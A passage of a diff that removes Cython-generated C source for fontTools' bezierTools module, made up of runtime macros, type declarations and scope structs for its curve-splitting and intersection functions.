PyBytes_AS_STRING(s)) -#define __Pyx_PyBytes_AsString(s) ((const char*) PyBytes_AS_STRING(s)) -#define __Pyx_PyBytes_AsSString(s) ((const signed char*) PyBytes_AS_STRING(s)) -#define __Pyx_PyBytes_AsUString(s) ((const unsigned char*) PyBytes_AS_STRING(s)) -#define __Pyx_PyObject_AsWritableString(s) ((char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) -#define __Pyx_PyObject_AsWritableSString(s) ((signed char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) -#define __Pyx_PyObject_AsWritableUString(s) ((unsigned char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) -#define __Pyx_PyObject_AsSString(s) ((const signed char*) __Pyx_PyObject_AsString(s)) -#define __Pyx_PyObject_AsUString(s) ((const unsigned char*) __Pyx_PyObject_AsString(s)) -#define __Pyx_PyObject_FromCString(s) __Pyx_PyObject_FromString((const char*)s) -#define __Pyx_PyBytes_FromCString(s) __Pyx_PyBytes_FromString((const char*)s) -#define __Pyx_PyByteArray_FromCString(s) __Pyx_PyByteArray_FromString((const char*)s) -#define __Pyx_PyStr_FromCString(s) __Pyx_PyStr_FromString((const char*)s) -#define __Pyx_PyUnicode_FromCString(s) __Pyx_PyUnicode_FromString((const char*)s) -#if CYTHON_COMPILING_IN_LIMITED_API -static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const wchar_t *u) -{ - const wchar_t *u_end = u; - while (*u_end++) ; - return (size_t)(u_end - u - 1); -} -#else -static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const Py_UNICODE *u) -{ - const Py_UNICODE *u_end = u; - while (*u_end++) ; - return (size_t)(u_end - u - 1); -} -#endif -#define __Pyx_PyUnicode_FromOrdinal(o) PyUnicode_FromOrdinal((int)o) -#define __Pyx_PyUnicode_FromUnicode(u) PyUnicode_FromUnicode(u, __Pyx_Py_UNICODE_strlen(u)) -#define __Pyx_PyUnicode_FromUnicodeAndLength PyUnicode_FromUnicode -#define __Pyx_PyUnicode_AsUnicode PyUnicode_AsUnicode -#define __Pyx_NewRef(obj) (Py_INCREF(obj), obj) -#define __Pyx_Owned_Py_None(b) __Pyx_NewRef(Py_None) -static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b); -static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject*); -static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject*); -static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x); -#define __Pyx_PySequence_Tuple(obj)\ - (likely(PyTuple_CheckExact(obj)) ? __Pyx_NewRef(obj) : PySequence_Tuple(obj)) -static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject*); -static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t); -static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject*); -#if CYTHON_ASSUME_SAFE_MACROS -#define __pyx_PyFloat_AsDouble(x) (PyFloat_CheckExact(x) ? PyFloat_AS_DOUBLE(x) : PyFloat_AsDouble(x)) -#else -#define __pyx_PyFloat_AsDouble(x) PyFloat_AsDouble(x) -#endif -#define __pyx_PyFloat_AsFloat(x) ((float) __pyx_PyFloat_AsDouble(x)) -#if PY_MAJOR_VERSION >= 3 -#define __Pyx_PyNumber_Int(x) (PyLong_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Long(x)) -#else -#define __Pyx_PyNumber_Int(x) (PyInt_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Int(x)) -#endif -#if CYTHON_USE_PYLONG_INTERNALS - #if PY_VERSION_HEX >= 0x030C00A7 - #ifndef _PyLong_SIGN_MASK - #define _PyLong_SIGN_MASK 3 - #endif - #ifndef _PyLong_NON_SIZE_BITS - #define _PyLong_NON_SIZE_BITS 3 - #endif - #define __Pyx_PyLong_Sign(x) (((PyLongObject*)x)->long_value.lv_tag & _PyLong_SIGN_MASK) - #define __Pyx_PyLong_IsNeg(x) ((__Pyx_PyLong_Sign(x) & 2) != 0) - #define __Pyx_PyLong_IsNonNeg(x) (!__Pyx_PyLong_IsNeg(x)) - #define __Pyx_PyLong_IsZero(x) (__Pyx_PyLong_Sign(x) & 1) - #define __Pyx_PyLong_IsPos(x) (__Pyx_PyLong_Sign(x) == 0) - #define __Pyx_PyLong_CompactValueUnsigned(x) (__Pyx_PyLong_Digits(x)[0]) - #define __Pyx_PyLong_DigitCount(x) ((Py_ssize_t) (((PyLongObject*)x)->long_value.lv_tag >> _PyLong_NON_SIZE_BITS)) - #define __Pyx_PyLong_SignedDigitCount(x)\ - ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * __Pyx_PyLong_DigitCount(x)) - #if defined(PyUnstable_Long_IsCompact) && defined(PyUnstable_Long_CompactValue) - #define __Pyx_PyLong_IsCompact(x) PyUnstable_Long_IsCompact((PyLongObject*) x) - #define __Pyx_PyLong_CompactValue(x) PyUnstable_Long_CompactValue((PyLongObject*) x) - #else - #define __Pyx_PyLong_IsCompact(x) (((PyLongObject*)x)->long_value.lv_tag < (2 << _PyLong_NON_SIZE_BITS)) - #define __Pyx_PyLong_CompactValue(x) ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * (Py_ssize_t) __Pyx_PyLong_Digits(x)[0]) - #endif - typedef Py_ssize_t __Pyx_compact_pylong; - typedef size_t __Pyx_compact_upylong; - #else // Py < 3.12 - #define __Pyx_PyLong_IsNeg(x) (Py_SIZE(x) < 0) - #define __Pyx_PyLong_IsNonNeg(x) (Py_SIZE(x) >= 0) - #define __Pyx_PyLong_IsZero(x) (Py_SIZE(x) == 0) - #define __Pyx_PyLong_IsPos(x) (Py_SIZE(x) > 0) - #define __Pyx_PyLong_CompactValueUnsigned(x) ((Py_SIZE(x) == 0) ? 0 : __Pyx_PyLong_Digits(x)[0]) - #define __Pyx_PyLong_DigitCount(x) __Pyx_sst_abs(Py_SIZE(x)) - #define __Pyx_PyLong_SignedDigitCount(x) Py_SIZE(x) - #define __Pyx_PyLong_IsCompact(x) (Py_SIZE(x) == 0 || Py_SIZE(x) == 1 || Py_SIZE(x) == -1) - #define __Pyx_PyLong_CompactValue(x)\ - ((Py_SIZE(x) == 0) ? (sdigit) 0 : ((Py_SIZE(x) < 0) ? -(sdigit)__Pyx_PyLong_Digits(x)[0] : (sdigit)__Pyx_PyLong_Digits(x)[0])) - typedef sdigit __Pyx_compact_pylong; - typedef digit __Pyx_compact_upylong; - #endif - #if PY_VERSION_HEX >= 0x030C00A5 - #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->long_value.ob_digit) - #else - #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->ob_digit) - #endif -#endif -#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII -#include -static int __Pyx_sys_getdefaultencoding_not_ascii; -static int __Pyx_init_sys_getdefaultencoding_params(void) { - PyObject* sys; - PyObject* default_encoding = NULL; - PyObject* ascii_chars_u = NULL; - PyObject* ascii_chars_b = NULL; - const char* default_encoding_c; - sys = PyImport_ImportModule("sys"); - if (!sys) goto bad; - default_encoding = PyObject_CallMethod(sys, (char*) "getdefaultencoding", NULL); - Py_DECREF(sys); - if (!default_encoding) goto bad; - default_encoding_c = PyBytes_AsString(default_encoding); - if (!default_encoding_c) goto bad; - if (strcmp(default_encoding_c, "ascii") == 0) { - __Pyx_sys_getdefaultencoding_not_ascii = 0; - } else { - char ascii_chars[128]; - int c; - for (c = 0; c < 128; c++) { - ascii_chars[c] = (char) c; - } - __Pyx_sys_getdefaultencoding_not_ascii = 1; - ascii_chars_u = PyUnicode_DecodeASCII(ascii_chars, 128, NULL); - if (!ascii_chars_u) goto bad; - ascii_chars_b = PyUnicode_AsEncodedString(ascii_chars_u, default_encoding_c, NULL); - if (!ascii_chars_b || !PyBytes_Check(ascii_chars_b) || memcmp(ascii_chars, PyBytes_AS_STRING(ascii_chars_b), 128) != 0) { - PyErr_Format( - PyExc_ValueError, - "This module compiled with c_string_encoding=ascii, but default encoding '%.200s' is not a superset of ascii.", - default_encoding_c); - goto bad; - } - Py_DECREF(ascii_chars_u); - Py_DECREF(ascii_chars_b); - } - Py_DECREF(default_encoding); - return 0; -bad: - Py_XDECREF(default_encoding); - Py_XDECREF(ascii_chars_u); - Py_XDECREF(ascii_chars_b); - return -1; -} -#endif -#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT && PY_MAJOR_VERSION >= 3 -#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_DecodeUTF8(c_str, size, NULL) -#else -#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_Decode(c_str, size, __PYX_DEFAULT_STRING_ENCODING, NULL) -#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT -#include -static char* __PYX_DEFAULT_STRING_ENCODING; -static int __Pyx_init_sys_getdefaultencoding_params(void) { - PyObject* sys; - PyObject* default_encoding = NULL; - char* default_encoding_c; - sys = PyImport_ImportModule("sys"); - if (!sys) goto bad; - default_encoding = PyObject_CallMethod(sys, (char*) (const char*) "getdefaultencoding", NULL); - Py_DECREF(sys); - if (!default_encoding) goto bad; - default_encoding_c = PyBytes_AsString(default_encoding); - if (!default_encoding_c) goto bad; - __PYX_DEFAULT_STRING_ENCODING = (char*) malloc(strlen(default_encoding_c) + 1); - if (!__PYX_DEFAULT_STRING_ENCODING) goto bad; - strcpy(__PYX_DEFAULT_STRING_ENCODING, default_encoding_c); - Py_DECREF(default_encoding); - return 0; -bad: - Py_XDECREF(default_encoding); - return -1; -} -#endif -#endif - - -/* Test for GCC > 2.95 */ -#if defined(__GNUC__) && (__GNUC__ > 2 || (__GNUC__ == 2 && (__GNUC_MINOR__ > 95))) - #define likely(x) __builtin_expect(!!(x), 1) - #define unlikely(x) __builtin_expect(!!(x), 0) -#else /* !__GNUC__ or GCC < 2.95 */ - #define likely(x) (x) - #define unlikely(x) (x) -#endif /* __GNUC__ */ -static CYTHON_INLINE void __Pyx_pretend_to_initialize(void* ptr) { (void)ptr; } - -#if !CYTHON_USE_MODULE_STATE -static PyObject *__pyx_m = NULL; -#endif -static int __pyx_lineno; -static int __pyx_clineno = 0; -static const char * __pyx_cfilenm = __FILE__; -static const char *__pyx_filename; - -/* Header.proto */ -#if !defined(CYTHON_CCOMPLEX) - #if defined(__cplusplus) - #define CYTHON_CCOMPLEX 1 - #elif (defined(_Complex_I) && !defined(_MSC_VER)) || ((defined (__STDC_VERSION__) && __STDC_VERSION__ >= 201112L) && !defined(__STDC_NO_COMPLEX__)) - #define CYTHON_CCOMPLEX 1 - #else - #define CYTHON_CCOMPLEX 0 - #endif -#endif -#if CYTHON_CCOMPLEX - #ifdef __cplusplus - #include - #else - #include - #endif -#endif -#if CYTHON_CCOMPLEX && !defined(__cplusplus) && defined(__sun__) && defined(__GNUC__) - #undef _Complex_I - #define _Complex_I 1.0fj -#endif - -/* #### Code section: filename_table ### */ - -static const char *__pyx_f[] = { - "Lib/fontTools/misc/bezierTools.py", -}; -/* #### Code section: utility_code_proto_before_types ### */ -/* ForceInitThreads.proto */ -#ifndef __PYX_FORCE_INIT_THREADS - #define __PYX_FORCE_INIT_THREADS 0 -#endif - -/* #### Code section: numeric_typedefs ### */ -/* #### Code section: complex_type_declarations ### */ -/* Declarations.proto */ -#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) - #ifdef __cplusplus - typedef ::std::complex< double > __pyx_t_double_complex; - #else - typedef double _Complex __pyx_t_double_complex; - #endif -#else - typedef struct { double real, imag; } __pyx_t_double_complex; -#endif -static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double, double); - -/* #### Code section: type_declarations ### */ - -/*--- Type declarations ---*/ -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr; -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr; -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC; -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC; -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr; -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t; -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr; -struct __pyx_defaults; -typedef struct __pyx_defaults __pyx_defaults; -struct __pyx_defaults { - PyObject *__pyx_arg_sqrt; -}; - -/* "fontTools/misc/bezierTools.py":546 - * a[isHorizontal], b[isHorizontal], c[isHorizontal] - where - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 1) # <<<<<<<<<<<<<< - * if not solutions: - * return [(pt1, pt2, pt3)] - */ -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr { - PyObject_HEAD - PyObject *__pyx_genexpr_arg_0; - PyObject *__pyx_v_t; -}; - - -/* "fontTools/misc/bezierTools.py":583 - * a[isHorizontal], b[isHorizontal], c[isHorizontal], d[isHorizontal] - where - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 1) # <<<<<<<<<<<<<< - * if not solutions: - * return [(pt1, pt2, pt3, pt4)] - */ -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr { - PyObject_HEAD - PyObject *__pyx_genexpr_arg_0; - PyObject *__pyx_v_t; -}; - - -/* "fontTools/misc/bezierTools.py":637 - * - * - * @cython.locals( # <<<<<<<<<<<<<< - * pt1=cython.complex, - * pt2=cython.complex, - */ -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC { - PyObject_HEAD - __pyx_t_double_complex __pyx_v_a; - __pyx_t_double_complex __pyx_v_b; - __pyx_t_double_complex __pyx_v_c; - __pyx_t_double_complex __pyx_v_d; - __pyx_t_double_complex __pyx_v_pt1; - __pyx_t_double_complex __pyx_v_pt2; - __pyx_t_double_complex __pyx_v_pt3; - __pyx_t_double_complex __pyx_v_pt4; - PyObject *__pyx_v_ts; -}; - - -/* "fontTools/misc/bezierTools.py":763 - * - * - * @cython.locals( # <<<<<<<<<<<<<< - * a=cython.complex, - * b=cython.complex, - */ -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC { - PyObject_HEAD - __pyx_t_double_complex __pyx_v_a; - __pyx_t_double_complex __pyx_v_a1; - __pyx_t_double_complex __pyx_v_b; - __pyx_t_double_complex __pyx_v_b1; - __pyx_t_double_complex __pyx_v_c; - __pyx_t_double_complex __pyx_v_c1; - __pyx_t_double_complex __pyx_v_d; - __pyx_t_double_complex __pyx_v_d1; - double __pyx_v_delta; - double __pyx_v_delta_2; - double __pyx_v_delta_3; - PyObject *__pyx_v_i; - PyObject *__pyx_v_pt1; - PyObject *__pyx_v_pt2; - PyObject *__pyx_v_pt3; - PyObject *__pyx_v_pt4; - double __pyx_v_t1; - double __pyx_v_t1_2; - double __pyx_v_t1_3; - double __pyx_v_t2; - PyObject *__pyx_v_ts; - PyObject *__pyx_t_0; - Py_ssize_t __pyx_t_1; - PyObject *(*__pyx_t_2)(PyObject *); -}; - - -/* "fontTools/misc/bezierTools.py":1245 - * else: - * raise ValueError("Unknown curve degree") - * return sorted(i for i in intersections if 0.0 <= i <= 1) # <<<<<<<<<<<<<< - * - * - */ -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr { - PyObject_HEAD - PyObject *__pyx_genexpr_arg_0; - PyObject *__pyx_v_i; -}; - - -/* "fontTools/misc/bezierTools.py":1306 - * - * - * def _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * curve1, curve2, precision=1e-3, range1=None, range2=None - * ): - */ -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t { - PyObject_HEAD - PyObject *__pyx_v_precision; -}; - - -/* "fontTools/misc/bezierTools.py":1459 - * return "%g" % obj - * else: - * return "(%s)" % ", ".join(_segmentrepr(x) for x in it) # <<<<<<<<<<<<<< - * - * - */ -struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr { - PyObject_HEAD - PyObject *__pyx_genexpr_arg_0; - PyObject *__pyx_v_x; -}; - -/* #### Code section: utility_code_proto ### */ - -/* --- Runtime support code (head) --- */ -/* Refnanny.proto */ -#ifndef CYTHON_REFNANNY - #define CYTHON_REFNANNY 0 -#endif -#if CYTHON_REFNANNY - typedef struct { - void (*INCREF)(void*, PyObject*, Py_ssize_t); - void (*DECREF)(void*, PyObject*, Py_ssize_t); - void (*GOTREF)(void*, PyObject*, Py_ssize_t); - void (*GIVEREF)(void*, PyObject*, Py_ssize_t); - void* (*SetupContext)(const char*, Py_ssize_t, const char*); - void (*FinishContext)(void**); - } __Pyx_RefNannyAPIStruct; - static __Pyx_RefNannyAPIStruct *__Pyx_RefNanny = NULL; - static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname); - #define __Pyx_RefNannyDeclarations void *__pyx_refnanny = NULL; -#ifdef WITH_THREAD - #define __Pyx_RefNannySetupContext(name, acquire_gil)\ - if (acquire_gil) {\ - PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ - __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ - PyGILState_Release(__pyx_gilstate_save);\ - } else {\ - __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ - } - #define __Pyx_RefNannyFinishContextNogil() {\ - PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ - __Pyx_RefNannyFinishContext();\ - PyGILState_Release(__pyx_gilstate_save);\ - } -#else - #define __Pyx_RefNannySetupContext(name, acquire_gil)\ - __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__)) - #define __Pyx_RefNannyFinishContextNogil() __Pyx_RefNannyFinishContext() -#endif - #define __Pyx_RefNannyFinishContextNogil() {\ - PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ - __Pyx_RefNannyFinishContext();\ - PyGILState_Release(__pyx_gilstate_save);\ - } - #define __Pyx_RefNannyFinishContext()\ - __Pyx_RefNanny->FinishContext(&__pyx_refnanny) - #define __Pyx_INCREF(r) __Pyx_RefNanny->INCREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) - #define __Pyx_DECREF(r) __Pyx_RefNanny->DECREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) - #define __Pyx_GOTREF(r) __Pyx_RefNanny->GOTREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) - #define __Pyx_GIVEREF(r) __Pyx_RefNanny->GIVEREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) - #define __Pyx_XINCREF(r) do { if((r) == NULL); else {__Pyx_INCREF(r); }} while(0) - #define __Pyx_XDECREF(r) do { if((r) == NULL); else {__Pyx_DECREF(r); }} while(0) - #define __Pyx_XGOTREF(r) do { if((r) == NULL); else {__Pyx_GOTREF(r); }} while(0) - #define __Pyx_XGIVEREF(r) do { if((r) == NULL); else {__Pyx_GIVEREF(r);}} while(0) -#else - #define __Pyx_RefNannyDeclarations - #define __Pyx_RefNannySetupContext(name, acquire_gil) - #define __Pyx_RefNannyFinishContextNogil() - #define __Pyx_RefNannyFinishContext() - #define __Pyx_INCREF(r) Py_INCREF(r) - #define __Pyx_DECREF(r) Py_DECREF(r) - #define __Pyx_GOTREF(r) - #define __Pyx_GIVEREF(r) - #define __Pyx_XINCREF(r) Py_XINCREF(r) - #define __Pyx_XDECREF(r) Py_XDECREF(r) - #define __Pyx_XGOTREF(r) - #define __Pyx_XGIVEREF(r) -#endif -#define __Pyx_Py_XDECREF_SET(r, v) do {\ - PyObject *tmp = (PyObject *) r;\ - r = v; Py_XDECREF(tmp);\ - } while (0) -#define __Pyx_XDECREF_SET(r, v) do {\ - PyObject *tmp = (PyObject *) r;\ - r = v; __Pyx_XDECREF(tmp);\ - } while (0) -#define __Pyx_DECREF_SET(r, v) do {\ - PyObject *tmp = (PyObject *) r;\ - r = v; __Pyx_DECREF(tmp);\ - } while (0) -#define __Pyx_CLEAR(r) do { PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);} while(0) -#define __Pyx_XCLEAR(r) do { if((r) != NULL) {PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);}} while(0) - -/* PyErrExceptionMatches.proto */ -#if CYTHON_FAST_THREAD_STATE -#define __Pyx_PyErr_ExceptionMatches(err) __Pyx_PyErr_ExceptionMatchesInState(__pyx_tstate, err) -static CYTHON_INLINE int __Pyx_PyErr_ExceptionMatchesInState(PyThreadState* tstate, PyObject* err); -#else -#define __Pyx_PyErr_ExceptionMatches(err) PyErr_ExceptionMatches(err) -#endif - -/* PyThreadStateGet.proto */ -#if CYTHON_FAST_THREAD_STATE -#define __Pyx_PyThreadState_declare PyThreadState *__pyx_tstate; -#define __Pyx_PyThreadState_assign __pyx_tstate = __Pyx_PyThreadState_Current; -#if PY_VERSION_HEX >= 0x030C00A6 -#define __Pyx_PyErr_Occurred() (__pyx_tstate->current_exception != NULL) -#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->current_exception ? (PyObject*) Py_TYPE(__pyx_tstate->current_exception) : (PyObject*) NULL) -#else -#define __Pyx_PyErr_Occurred() (__pyx_tstate->curexc_type != NULL) -#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->curexc_type) -#endif -#else -#define __Pyx_PyThreadState_declare -#define __Pyx_PyThreadState_assign -#define __Pyx_PyErr_Occurred() (PyErr_Occurred() != NULL) -#define __Pyx_PyErr_CurrentExceptionType() PyErr_Occurred() -#endif - -/* PyErrFetchRestore.proto */ -#if CYTHON_FAST_THREAD_STATE -#define __Pyx_PyErr_Clear() __Pyx_ErrRestore(NULL, NULL, NULL) -#define __Pyx_ErrRestoreWithState(type, value, tb) __Pyx_ErrRestoreInState(PyThreadState_GET(), type, value, tb) -#define __Pyx_ErrFetchWithState(type, value, tb) __Pyx_ErrFetchInState(PyThreadState_GET(), type, value, tb) -#define __Pyx_ErrRestore(type, value, tb) __Pyx_ErrRestoreInState(__pyx_tstate, type, value, tb) -#define __Pyx_ErrFetch(type, value, tb) __Pyx_ErrFetchInState(__pyx_tstate, type, value, tb) -static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb); -static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); -#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A6 -#define __Pyx_PyErr_SetNone(exc) (Py_INCREF(exc), __Pyx_ErrRestore((exc), NULL, NULL)) -#else -#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) -#endif -#else -#define __Pyx_PyErr_Clear() PyErr_Clear() -#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) -#define __Pyx_ErrRestoreWithState(type, value, tb) PyErr_Restore(type, value, tb) -#define __Pyx_ErrFetchWithState(type, value, tb) PyErr_Fetch(type, value, tb) -#define __Pyx_ErrRestoreInState(tstate, type, value, tb) PyErr_Restore(type, value, tb) -#define __Pyx_ErrFetchInState(tstate, type, value, tb) PyErr_Fetch(type, value, tb) -#define __Pyx_ErrRestore(type, value, tb) PyErr_Restore(type, value, tb) -#define __Pyx_ErrFetch(type, value, tb) PyErr_Fetch(type, value, tb) -#endif - -/* PyObjectGetAttrStr.proto */ -#if CYTHON_USE_TYPE_SLOTS -static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name); -#else -#define __Pyx_PyObject_GetAttrStr(o,n) PyObject_GetAttr(o,n) -#endif - -/* PyObjectGetAttrStrNoError.proto */ -static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name); - -/* GetBuiltinName.proto */ -static PyObject *__Pyx_GetBuiltinName(PyObject *name); - -/* TupleAndListFromArray.proto */ -#if CYTHON_COMPILING_IN_CPYTHON -static CYTHON_INLINE PyObject* __Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n); -static CYTHON_INLINE PyObject* __Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n); -#endif - -/* IncludeStringH.proto */ -#include - -/* BytesEquals.proto */ -static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals); - -/* UnicodeEquals.proto */ -static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals); - -/* fastcall.proto */ -#if CYTHON_AVOID_BORROWED_REFS - #define __Pyx_Arg_VARARGS(args, i) PySequence_GetItem(args, i) -#elif CYTHON_ASSUME_SAFE_MACROS - #define __Pyx_Arg_VARARGS(args, i) PyTuple_GET_ITEM(args, i) -#else - #define __Pyx_Arg_VARARGS(args, i) PyTuple_GetItem(args, i) -#endif -#if CYTHON_AVOID_BORROWED_REFS - #define __Pyx_Arg_NewRef_VARARGS(arg) __Pyx_NewRef(arg) - #define __Pyx_Arg_XDECREF_VARARGS(arg) Py_XDECREF(arg) -#else - #define __Pyx_Arg_NewRef_VARARGS(arg) arg // no-op - #define __Pyx_Arg_XDECREF_VARARGS(arg) // no-op - arg is borrowed -#endif -#define __Pyx_NumKwargs_VARARGS(kwds) PyDict_Size(kwds) -#define __Pyx_KwValues_VARARGS(args, nargs) NULL -#define __Pyx_GetKwValue_VARARGS(kw, kwvalues, s) __Pyx_PyDict_GetItemStrWithError(kw, s) -#define __Pyx_KwargsAsDict_VARARGS(kw, kwvalues) PyDict_Copy(kw) -#if CYTHON_METH_FASTCALL - #define __Pyx_Arg_FASTCALL(args, i) args[i] - #define __Pyx_NumKwargs_FASTCALL(kwds) PyTuple_GET_SIZE(kwds) - #define __Pyx_KwValues_FASTCALL(args, nargs) ((args) + (nargs)) - static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s); - #define __Pyx_KwargsAsDict_FASTCALL(kw, kwvalues) _PyStack_AsDict(kwvalues, kw) - #define __Pyx_Arg_NewRef_FASTCALL(arg) arg // no-op, __Pyx_Arg_FASTCALL is direct and this needs - #define __Pyx_Arg_XDECREF_FASTCALL(arg) // no-op - arg was returned from array -#else - #define __Pyx_Arg_FASTCALL __Pyx_Arg_VARARGS - #define __Pyx_NumKwargs_FASTCALL __Pyx_NumKwargs_VARARGS - #define __Pyx_KwValues_FASTCALL __Pyx_KwValues_VARARGS - #define __Pyx_GetKwValue_FASTCALL __Pyx_GetKwValue_VARARGS - #define __Pyx_KwargsAsDict_FASTCALL __Pyx_KwargsAsDict_VARARGS - #define __Pyx_Arg_NewRef_FASTCALL(arg) __Pyx_Arg_NewRef_VARARGS(arg) - #define __Pyx_Arg_XDECREF_FASTCALL(arg) __Pyx_Arg_XDECREF_VARARGS(arg) -#endif -#if CYTHON_COMPILING_IN_CPYTHON && CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS -#define __Pyx_ArgsSlice_VARARGS(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_VARARGS(args, start), stop - start) -#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_FASTCALL(args, start), stop - start) -#else -#define __Pyx_ArgsSlice_VARARGS(args, start, stop) PyTuple_GetSlice(args, start, stop) -#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) PyTuple_GetSlice(args, start, stop) -#endif - -/* RaiseArgTupleInvalid.proto */ -static void __Pyx_RaiseArgtupleInvalid(const char* func_name, int exact, - Py_ssize_t num_min, Py_ssize_t num_max, Py_ssize_t num_found); - -/* RaiseDoubleKeywords.proto */ -static void __Pyx_RaiseDoubleKeywordsError(const char* func_name, PyObject* kw_name); - -/* ParseKeywords.proto */ -static int __Pyx_ParseOptionalKeywords(PyObject *kwds, PyObject *const *kwvalues, - PyObject **argnames[], - PyObject *kwds2, PyObject *values[], Py_ssize_t num_pos_args, - const char* function_name); - -/* PyDictVersioning.proto */ -#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS -#define __PYX_DICT_VERSION_INIT ((PY_UINT64_T) -1) -#define __PYX_GET_DICT_VERSION(dict) (((PyDictObject*)(dict))->ma_version_tag) -#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var)\ - (version_var) = __PYX_GET_DICT_VERSION(dict);\ - (cache_var) = (value); -#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) {\ - static PY_UINT64_T __pyx_dict_version = 0;\ - static PyObject *__pyx_dict_cached_value = NULL;\ - if (likely(__PYX_GET_DICT_VERSION(DICT) == __pyx_dict_version)) {\ - (VAR) = __pyx_dict_cached_value;\ - } else {\ - (VAR) = __pyx_dict_cached_value = (LOOKUP);\ - __pyx_dict_version = __PYX_GET_DICT_VERSION(DICT);\ - }\ -} -static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj); -static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj); -static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version); -#else -#define __PYX_GET_DICT_VERSION(dict) (0) -#define __PYX_UPDATE_DICT_CACHE(dict, value, 